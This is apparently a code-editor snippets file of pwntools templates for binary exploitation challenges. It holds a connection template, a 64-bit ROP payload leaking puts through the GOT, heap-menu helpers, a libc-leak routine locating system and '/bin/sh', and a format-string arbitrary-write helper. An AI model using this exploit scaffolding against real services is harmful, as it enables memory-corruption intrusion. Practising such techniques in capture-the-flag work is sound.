{ "Basic Pwntools Template": { "prefix": "pwn-basic", "body": [ "from pwn import *", "", "context.log_level = 'debug'", "context.arch = '${1:amd64}'", "", "LOCAL = True", "if LOCAL:", " p = process('./${2:binary}')", " #libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')", "else:", " p = remote('${3:ip}', ${4:port})", " #libc = ELF('./libc.so.6')", "", "elf = ELF('./${2:binary}')", "", "$0", "p.interactive()" ] }, "ROP Chain 64bit": { "prefix": "pwn-rop64", "body": [ "puts_plt = elf.plt['puts']", "puts_got = elf.got['puts']", "main_addr = elf.symbols['main']", "", "pop_rdi = 0x400683 # ROPgadget --binary ./binary --only \"pop|ret\"", "ret = 0x40028e # stack alignment", "", "payload = flat([", " b'A'*${1:offset},", " p64(pop_rdi),", " p64(puts_got),", " p64(puts_plt),", " p64(main_addr)", "])", "$0" ] }, "Heap Functions": { "prefix": "pwn-heap", "body": [ "def add(size, content):", " p.sendlineafter('Choice:', '1')", " p.sendlineafter('Size:', str(size))", " p.sendafter('Content:', content)", "", "def delete(index):", " p.sendlineafter('Choice:', '2')", " p.sendlineafter('Index:', str(index))", "", "def edit(index, content):", " p.sendlineafter('Choice:', '3')", " p.sendlineafter('Index:', str(index))", " p.sendafter('Content:', content)", "", "def show(index):", " p.sendlineafter('Choice:', '4')", " p.sendlineafter('Index:', str(index))", "$0" ] }, "Libc Leak": { "prefix": "pwn-libc", "body": [ "puts_leak = u64(p.recvuntil('\\n', drop=True).ljust(8, b'\\x00'))", "libc_base = puts_leak - libc.symbols['puts']", "system_addr = libc_base + libc.symbols['system']", "binsh_addr = libc_base + next(libc.search(b'/bin/sh'))", "$0" ] }, "GDB Debug": { "prefix": "pwn-gdb", "body": ["gdb.attach(p, '''", "b *${1:0x400789}", "c", "''')", "$0"] }, "Format String": { "prefix": "pwn-fmt", "body": [ "def write_anywhere(addr, value):", " payload = fmtstr_payload(${1:offset}, {addr: value})", " p.sendline(payload)", "$0" ] } }